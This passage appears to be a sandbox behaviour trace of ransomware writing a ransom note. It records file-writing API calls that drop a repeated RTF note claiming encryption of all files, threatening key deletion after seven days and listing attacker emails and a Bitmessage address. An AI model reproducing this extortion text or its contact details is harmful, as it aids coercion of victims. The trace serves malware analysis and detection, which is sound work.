{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.327] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.328] CloseHandle (hObject=0x294) returned 1 [0273.328] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0273.328] GetLastError () returned 0x2 [0273.328] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.331] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 